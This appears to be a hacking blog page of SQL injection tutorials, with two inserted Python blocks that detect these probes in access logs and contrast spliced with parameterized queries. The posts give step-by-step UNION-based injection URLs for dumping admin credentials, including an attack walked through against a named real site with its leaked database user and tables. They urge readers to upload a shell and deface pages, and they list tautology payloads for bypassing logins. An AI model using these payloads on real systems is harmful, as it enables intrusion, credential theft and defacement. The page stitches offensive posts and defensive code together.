Showing posts with label SQL. Show all posts

Tuesday

SQL Injection with error

Ok, in this tutorial I will show you how to hack a website with a MySQL error. Ok, let's follow these steps and you will reach your destination.
1. Check if your target is vulnerable.
http://www.target.com/id=2 //no error
http://www.target.com/id=2# //error or something is missing -> website is vulnerable
2. Columns
http://www.target.com/id=2 order by 1 (no error)
http://www.target.com/id=2 order by 2 (no error)
http://www.target.com/id=2 order by 3 (no error)
http://www.target.com/id=2 order by 4 (no error)
http://www.target.com/id=2 order by 5 (error) --> the website has 4 columns; if this method doesn't work use order by 1--
3. Find the vulnerable column
http://www.target.com/id=2 union select 1, 2, 3, 4 --> if this method doesn't work use
http://www.target.com/id=2 and 1=2 union select 1, 2, 3, 4--
4. Getting version
http://www.target.com/id=2 union select 1, 2,@@version,4--
5. Getting table names
http://www.target.com/id=2 union select 1, 2,group_concat(table_name), 4 from information_schema.tables where table_schema=database()--
6. Getting columns
http://www.target.com/id=2 union select 1, 2, GROUP_CONCAT(column_name), 4 FROM information_schema.columns WHERE table_name=mysqlchar--
Now we have the column names. Let's use them:
http://www.target.com/id=2 union select 1, 2, group_concat(admin_id,0x3a,admin_password), 4 from admin--

Ok, now we have the admin name and the admin password.
Now you only have to find the admin login panel and log in.
You can use Acunetix Scanner or Havij to find it.

Saturday

Today I teach you SQL injection without error on PHP and MySQL.

1. Find a vulnerable target; for that, use a Google dork.
Here is the link for that:
http://www.hackforums.net/showthread.php?tid=1210804

2. Next, I have found one target:
http://cadaboutdrugs.ie/news.php?id=82

3. Check for vulnerability: put a single quote (') after the URL.
http://cadaboutdrugs.ie/news.php?id=82'

4. You can't find any error message, but you notice that some contents of the site vanished.

5. Now try the ORDER BY syntax.
http://cadaboutdrugs.ie/news.php?id=-82 ORDER BY 1--
http://cadaboutdrugs.ie/news.php?id=-82 ORDER BY 2--
http://cadaboutdrugs.ie/news.php?id=-82 ORDER BY 3--
http://cadaboutdrugs.ie/news.php?id=-82 ORDER BY 4--
I have tried up to 90 but I can't find any error.

6. Next step: apply the UNION syntax.
http://cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1--
http://cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,2--
http://cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,2,3--
http://cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,2,3,4--
http://cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,2,3,4,5--
http://cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,2,3,4,5,6--
http://cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,2,3,4,5,6,7--
http://cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,2,3,4,5,6,7,8--

7. Now at UNION SELECT 1,2,3,4,5,6,7,8-- you will see some vulnerable numbers on screen, e.g. 2 3 4

8. Now find the MySQL version, the user, and the database name.
http://cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,@@version,user(),database(),5,6,7,8--

9. Now you will see the following output:
5.1.49-log ---> MySQL Version

aboutdr_admin@web8.novara.ie ---> User

aboutdr_Test ---> Database Name

10. Now find all table names in the database
http://www.cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,GROUP_CONCAT(TABLE_NAME),3,4,5,6,7,8 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE()--

11. We got all our tables --> [about,carousel,contact,documents,donate,intro,links,members,news,services], among which the important table that stores the admin username and password is --> "members"

12. Find the column names of the "members" table. Go to the http://home2.paulschou.net/tools/xlate/ website.

13. Copy "members" without quotes into the [ TEXT ] field and press

14. Now we get the value "109 101 109 98 101 114 115" from the [ DEC / CHAR ] field.

15. Now our query to find the column names of the members table will be:
http://www.cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,GROUP_CONCAT(COLUMN_NAME),3,4,5,6,7,8 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=CHAR(109,101,109,98,101,114,115)--

16. Now we got all column names from the members table --> id,username,password

17. Now find the username and password; the query will be:
http://www.cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,GROUP_CONCAT(id,0x3a,username,0x3a,password),3,4,5,6,7,8 FROM members--

18. Here we got id, username and password; "0x3a" stands for --> [:] (colon)

19. Now go to the home page of the site, click on Admin Login, log in with the username and password and upload your shell; feel free to deface or upload any page.

I tried this server for root but unfortunately it's a patched server, so it can't be rooted.
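The two posts above follow the same probe sequence from the server's point of view: a stray quote, ORDER BY with an increasing number, UNION SELECT with a growing column list, then @@version / user() / database() and information_schema queries. As an added example that is not part of either post, here is Python detection logic that runs those patterns over constructed web-server access-log lines; the log lines, IP addresses, rule names and the two-tag threshold are made up for illustration, and the rules only cover the request forms shown on this page.

```python
"""Flag the injection probe sequence shown in the posts in access-log lines.

Added example, not code from the original blog. The log lines below are
constructed (Combined Log Format); the client addresses are documentation
ranges and the rule set is limited to the query shapes the posts use.
"""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Combined Log Format: client - - [timestamp] "METHOD path PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Each rule is matched against the decoded, lower-cased value of one query parameter.
RULES = {
    "stray_quote":    re.compile(r"^[^'\"]*['\"]\s*$"),          # id=82'  (step 3 / step 1)
    "order_by_probe": re.compile(r"\border\s+by\s+\d+"),          # column counting
    "union_select":   re.compile(r"\bunion\s+(all\s+)?select\b"), # column / data extraction
    "schema_enum":    re.compile(r"\binformation_schema\.(tables|columns)\b"),
    "fingerprint":    re.compile(r"@@version|\bversion\(\)|\buser\(\)|\bdatabase\(\)"),
    "tautology":      re.compile(r"(['\"])\s*or\s+(\d+\s*=\s*\d+|['\"]?\w+['\"]?\s*=\s*['\"]?\w+)"),
    "comment_tail":   re.compile(r"(--|#)\s*$"),                  # trailing -- or #
}

# Constructed sample log: one client walking through the probe sequence, one
# ordinary request, and one login-page tautology attempt from a second client.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /news.php?id=82 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:41 +0000] "GET /news.php?id=82' HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:49 +0000] "GET /news.php?id=-82%20ORDER%20BY%205-- HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:56:02 +0000] "GET /news.php?id=-82+UNION+SELECT+1,@@version,user(),database(),5,6,7,8-- HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:56:30 +0000] "GET /news.php?id=-82+UNION+SELECT+1,GROUP_CONCAT(TABLE_NAME),3+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()-- HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:14:01:00 +0000] "GET /search.asp?category=sports HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:14:01:09 +0000] "GET /login.asp?id=hi'+or+1=1-- HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
"""


def decode_params(path):
    """Return the query parameters of a request path as decoded (name, value) pairs."""
    return parse_qsl(urlsplit(path).query, keep_blank_values=True)


def classify_request(line):
    """Parse one log line; return the sorted list of rule names that fired,
    an empty list for a clean request, or None if the line is not parseable."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    tags = set()
    for _name, value in decode_params(m.group("path")):
        # parse_qsl already decoded once; decoding again catches double-encoded values.
        v = unquote_plus(value).lower()
        for tag, pattern in RULES.items():
            if pattern.search(v):
                tags.add(tag)
    return sorted(tags)


def scan_log(text):
    """Return {client_ip: {rule: hit_count}} for every line on which a rule fired."""
    hits = {}
    for line in text.splitlines():
        tags = classify_request(line)
        if not tags:
            continue
        ip = LOG_RE.match(line).group("ip")
        per_ip = hits.setdefault(ip, {})
        for tag in tags:
            per_ip[tag] = per_ip.get(tag, 0) + 1
    return hits


def suspicious_ips(text, min_distinct_tags=2):
    """Clients showing at least min_distinct_tags distinct probe types. A lone
    stray quote is often noise (O'Brien); ORDER BY probing followed by UNION
    SELECT is the column-count-then-extract sequence the posts walk through."""
    return sorted(ip for ip, tags in scan_log(text).items()
                  if len(tags) >= min_distinct_tags)


if __name__ == "__main__":
    for ip, tags in scan_log(SAMPLE_LOG).items():
        print(ip, tags)
    print("suspicious:", suspicious_ips(SAMPLE_LOG))
```

The threshold is the design choice worth tuning: a single quote in a parameter is a common false positive, but one client that produces an ORDER BY probe, a UNION SELECT and an information_schema query within a minute is the pattern above and deserves an alert regardless of the HTTP status codes, which both posts show staying at 200 throughout.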

Tuesday

How to hack a website using SQL injection

What is SQL injection?

SQL injection, or simply Structured Query Language injection, is a technique that exploits a loophole in the database layer of the application. This happens when a user mistakenly or purposely (hackers) enters special escape characters into the username/password authentication form or into the URL of the website. It's called a coding-standard loophole: some website owners don't have proper knowledge of secure coding standards, and that results in vulnerable websites. Now assume you opened a website and went to its sign-in or log-in page. In the username field you enter something, say yogesh, and in the password box you pass some escape characters like ', ", 1=1, etc. Now, if the website owner hasn't handled null characters or escape characters, the user will surely get something else that the owner never wanted their users to view. This is basically called Blind SQL.

Some basic requirements for SQL injection:
1) You need a web browser to open URLs and to view source code.
2) You need Notepad++.
3) And very basic SQL queries like INSERT, SELECT, UPDATE, DELETE, etc.

First of all, the websites you can hack using SQL injection are those that accept some input from the visitor, such as a log-in page, search page, feedback page, etc.
Nowadays, HTML pages use the POST command to send parameters to another ASP/ASPX page.
Therefore you may not see the parameter in the URL. You can check the source code of the HTML and look for the "FORM" tag. You may find something like this in some HTML code:



</FORM>


Everything between the <FORM> and </FORM> tags contains the crucial information and can help us determine things in more detail.



There is an alternate method for finding vulnerable websites: on websites with the extension ASP, ASPX, JSP, CGI or PHP, look for URLs in which parameters are passed. An example is shown below:


http://example.com/login.asp?id=10



Now, how to detect whether this URL is vulnerable or not:
Start with the single-quote trick; take the sample parameter hi' or 1=1--. In the above URL, id is the parameter and 10 is its value. So when we pass hi' or 1=1-- as the parameter, the URL will look like this:

http://example.com/login.asp?id=hi' or 1=1--




You can also do this with a hidden field; for that you need to save the web page, then change the URL and the parameter field and modify them accordingly. For example:
<FORM action=http://example.com/login.asp method=post>
<input type=hidden name=abc value="hi' or 1=1--">
</FORM>

If luck is favoring you, you will be logged into the website without any username or password.


But why ' or 1=1--?
Take an ASP page that links you to another page with the following URL:

http://example.com/search.asp?category=sports
In this URL, 'category' is the variable name and 'sports' is its value.

Here this request fires the following query on the database in the background:
SELECT * FROM TABLE-NAME WHERE category='sports'
where 'TABLE-NAME' is the name of a table already present in some database (call it 'search' below).
So this query returns all the entries from the table 'search' that come under the category 'sports'.

Now, assume that we change the URL into something like this:
http://example.com/search.asp?category=sports' or 1=1--

Now our variable 'category' equals "sports' or 1=1-- ", which fires an SQL query on the database something like: SELECT * FROM search WHERE category='sports' or 1=1--'

The query now selects everything from the 'search' table regardless of whether category equals 'sports' or not.
A double dash "--" tells MS SQL Server to ignore the rest of the query, which gets rid of the trailing single quote (').
Sometimes it may be possible to replace the double dash with a single hash "#".

However, if it is not SQL Server, or you simply cannot ignore the rest of the query, you may also try

' or 'a'='a

It should return the same result.
Depending on the actual SQL query, you may have to try some of these possibilities:
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
'or''='
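As an added example (not from the original post), the following Python script builds the 'search' table from the explanation above in an in-memory SQLite database and runs each listed payload, appended to the value sports, through both the string-spliced query the post describes and a parameterized version of it. The rows, the run_all helper and the use of SQLite are constructed here; SQLite, like MS SQL Server, treats -- as a comment, so the spliced query behaves as the post explains, while the bound parameter never changes the statement's shape.

```python
"""Why ' or 1=1-- works, and why a bound parameter does not care.

Added example, not code from the original blog. Table and column names come
from the post's explanation; the rows are constructed. Uses SQLite in memory.
"""
import sqlite3

# The variants listed at the end of the post, verbatim.
PAYLOADS = [
    "' or 1=1--",
    "\" or 1=1--",
    "or 1=1--",
    "' or 'a'='a",
    "\" or \"a\"=\"a",
    "') or ('a'='a",
    "'or''='",
]


def make_db():
    """Fresh in-memory database with the 'search' table from the post; 2 of 4 rows are sports."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE search (id INTEGER PRIMARY KEY, title TEXT, category TEXT)")
    conn.executemany(
        "INSERT INTO search (title, category) VALUES (?, ?)",
        [
            ("Cup final report", "sports"),
            ("League table", "sports"),
            ("Election results", "politics"),
            ("Budget summary", "finance"),
        ],
    )
    return conn


def vulnerable_search(conn, category):
    """The pattern the post describes: the request value is spliced into the SQL text,
    so a quote in the value ends the literal and the rest becomes SQL."""
    sql = f"SELECT * FROM search WHERE category='{category}'"
    return conn.execute(sql).fetchall()


def safe_search(conn, category):
    """Bound parameter: the value travels separately from the statement and is
    compared as data, quotes and all, so the statement's shape cannot change."""
    return conn.execute("SELECT * FROM search WHERE category=?", (category,)).fetchall()


def compare(payload):
    """Run 'sports' + payload through both functions.
    Returns (rows_from_vulnerable, rows_from_safe); a SQL syntax error in the
    spliced query is reported as the string 'error' (the 'error-based' signal
    the first post in this series relies on)."""
    category = "sports" + payload
    conn = make_db()
    try:
        vuln = len(vulnerable_search(conn, category))
    except sqlite3.Error:
        vuln = "error"
    safe = len(safe_search(conn, category))
    return vuln, safe


def run_all():
    """Map every listed payload to its (vulnerable, safe) row counts."""
    return {p: compare(p) for p in PAYLOADS}


if __name__ == "__main__":
    for payload, (vuln, safe) in run_all().items():
        print(f"{payload!r:20} spliced -> {vuln!s:6} parameterized -> {safe}")
```

Three of the seven variants dump the whole table through the spliced query, one produces a syntax error, and the double-quoted and unquoted forms do nothing here because this statement quotes the value with single quotes; that is exactly the "depending on the actual SQL query" point above. The parameterized query returns zero rows for every variant, which is the fix a defender applies: the payload is searched for as a category name and nothing else.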